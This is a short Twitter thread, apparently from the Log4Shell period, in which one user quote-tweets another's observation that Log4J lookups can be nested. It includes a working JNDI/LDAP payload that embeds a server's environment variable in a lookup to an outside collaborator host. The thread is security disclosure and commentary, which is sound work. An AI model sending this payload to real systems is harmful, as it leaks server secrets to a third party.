Twitter Feed
@gcouprie ("Geoffroy Couprie") replied to a tweet by @gcouprie:
It keeps getting better, and by better I mean way worse
with quote tweet:
@_StaticFlow_ ("Tanner Barnes") wrote:
In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like
${jndi:ldap://${env:user}.xyz.collab.com/a}
Will leak server side env vars!